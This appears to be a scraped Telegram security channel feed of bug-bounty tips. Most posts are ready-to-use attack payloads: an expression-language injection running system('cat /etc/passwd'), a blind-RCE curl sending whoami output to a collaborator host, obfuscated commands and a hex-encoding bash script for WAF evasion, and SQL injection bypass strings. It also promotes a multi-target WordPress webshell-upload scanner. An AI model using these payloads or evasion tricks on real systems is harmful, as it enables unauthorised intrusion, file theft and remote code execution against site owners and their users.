Brut Security
14.7K subscribers
910 photos
73 videos
287 files
967 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
πŸ›°οΈ Discover IPING β€” Your Go-To IP Intelligence Tool

πŸ’‘ IPING helps you uncover what’s behind any IP address in seconds.

🌍 From location and ASN to proxy status and risk level β€” all the insights you need for smarter investigations or secure online operations. No sign-up, no limits, only accurate results.

πŸš€ Explore now: https://www.iping.cc/
❀5πŸ”₯3
🌐CloudRip - A tool that helps you find the real IP addresses hiding behind Cloudflare by checking subdomains. For penetration testing, security research, and learning how Cloudflare protection works.

πŸ‘‰https://github.com/staxsum/CloudRip
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯16❀6πŸ‘1
Hey Hunter,
what do you think Web Cache to RCE possible or not?
Yes! It’s really very intresting, Post coming Soon.
😱20🫑6❀5
Hey Hunter's,
Darkshadow here back again, dropping a really very interesting Method.

πŸ’€Web cache to RCE!😁

While i normally visit the web application i noticed, the website actively makes cache file from clint side to store errors.

Now The idea is, if we able to make any custom error then it will be cached, and if any how the error execute on the system we might see the output.

βœ…Exploit to reproduce final RCE:

1. The webapp was sending request from client side in a array based parameter.

2. Change the valid Input to a PHP code using system function. Here we just try to making a error using the invalid input.

3. Now the web application is not able to handle this input and makes error and store in a cache file.

4. After visiting the cache file, The error message reflecting on the cache file.

5. But wait, it's also execute my PHP code and store the command output in the file. Means we can execute OS commands output in cache file via making error. Means RCE!

Follow me for more methods x.com/darkshadow2bd
πŸ”₯20πŸ—Ώ8😱4πŸ‘2❀1😒1
Hey Hunter's,
DarkShadow here back again, dropping a another interesting method!

πŸ’€Auth bypass using Host Header☠

Guy's This is most easiest and simple way to find most critical bug.


βœ…Step to Reproduce:
1. Open target in BurpSuite, and simply visit as possible deeper.
2. Filter all JS script files.
3. Figure out any sensitive path as well any Admin dashboard path.
4. Send request on the path via changing Host Header to localhost.

It's looks very simple guy's but still very impactful. Always add this technique in your checklist.

And also add me in your follow listπŸ™ƒ
x.com/darkshadow2bd

#bugbountytips #authbypass
1πŸ”₯18❀9πŸ‘2🀨2πŸ‘1🀝1
Hey Hunter’s,
DarkShadow here back again, dropping another easiest way to get critical bugs!

If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.

βœ…POC Payload:
1. Change the Method GET to POST
2. Language={${system("cat+/etc/passwd")}}


If you guy’s are really enjoy to read then show your love.

#bugbountytips #rce
1πŸ”₯27❀9πŸ‘5
Guys wanna see a very interesting blind RCE?
1πŸ”₯25πŸ‘10
Hey Hunter’s,
DarkShadow here back again!

☠️Blind Remote Code ExecutionπŸ”₯

βœ…POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" https://BURP_LINK"

Others format you might try:
curl whoami.BURP_LINK
curl $(whoami).BURP_LINK

some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output.

NOTICE: always check User-Agent Header in your burp collaborator responds, if here you got curl means RCE.

Now you hit follow me for more: x.com/darkshadow2bd
1πŸ”₯24❀6πŸ—Ώ6πŸ‘3
Easy win for my students. You can enroll for Live courses too - wa.link/brutsecurity
1❀19
Hey Hunter's,
DarkShadow here back again, dropping some bypass methods that definitely help you.

Trying OS command injection, but WAF blocks every times?

❌ cat /etc/hosts

βœ… tac /e\t\c/h\o\s\t\s
βœ… tac${IFS}/e\t\c/h\o\s\t\s
βœ… tac /e*c/h*st*
βœ… tac /e{t,c}*/{o,h}*s*{s,t}
βœ… tac /??c/??sts

Let me know guy's you all wants more or not like that?
1❀14😱11πŸ”₯6πŸ‘2
Brut Security
Hey Hunter's, DarkShadow here back again, dropping some bypass methods that definitely help you. Trying OS command injection, but WAF blocks every times? ❌ cat /etc/hosts βœ… tac /e\t\c/h\o\s\t\s βœ… tac${IFS}/e\t\c/h\o\s\t\s βœ… tac /e*c/h*st* βœ… tac /e{t,c}*/{o…
This is for copy cats who copy my posts and share without cradit:

Hey copy cats, stop copying my posts and do your self. If you don't think deeply then first learn deeply.

~DarkShadow
1🀝9❀5🫑4πŸ”₯2πŸ—Ώ2
🚨Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.

βœ…
https://github.com/ill-deed/CVE-2025-34085-Multi-target
πŸ‘5
Hey Hunter's,
DarkShadow here back again, dropping a really interesting bypass method!

❎WAF block: whoami
βœ…WAF bypass: $'\x77\x68\x6f\x61\x6d\x69'

✨Bash script:

#!/bin/bash
str="$1"
out=""
for ((i=0; i<${
#str}; i++)); do
    char="${str:i:1}"
    ascii=$(printf '%d' "'$char")
    hex=$(printf '%02x' "$ascii")
    out="${out}\\x${hex}"
done
echo "$'$out'"


Guy's using my this dark-hex script you can directly execute obfuscate commands in bash!

#bugbountytips #bypass
🫑18πŸ”₯7❀5
⚑️Outdated but Helpful Some MySQL tricks to break some #WAFs out there. βš”οΈ by @BRuteLogic

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`


#infosec #cybersec #bugbountytips
❀11
Hey Hunter’s,
DarkShadow is here back again!

Before Testing Complex RCE Payloads, SomeTimes You Need to Think Simple.

πŸ‘‡πŸ»Like:
parameter=value id

Now Guys simply show your love ❀️

#bugbountytips #rce
❀20πŸ”₯7
πŸ›‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi

When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!

❌ Blocked Payload
(select(0)from(select(sleep(10)))v) β†’ 403 Forbidden

βœ… Bypass Payload

(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)



πŸ” This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.

βœ…Credit: @nav1n0x
1❀11πŸ‘2